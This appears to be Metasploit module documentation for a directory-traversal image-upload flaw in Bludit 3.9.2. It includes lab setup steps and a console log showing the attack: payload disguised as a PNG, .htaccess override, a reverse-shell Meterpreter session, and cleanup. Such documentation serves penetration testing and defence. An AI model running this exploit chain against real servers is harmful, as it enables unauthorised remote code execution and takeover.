# Bludit Directory Traversal Image File Upload Vulnerability
## Description
This module exploits a vulnerability in Bludit, a simple, fast, "secure", flat-file CMS. The vulnerability, found by [christasa](https://github.com/christasa), is in the image uploading feature: a remote user could abuse the `uuid` parameter of the upload feature to save a malicious payload anywhere on the server, then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.
## Setup
1. Set up an Ubuntu box with Apache, PHP, and MySQL.
2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide). Make sure your Apache server sets `AllowOverride All` in `/etc/apache2/apache2.conf`.
## Scenarios
```
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 172.16.135.1:4444
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
```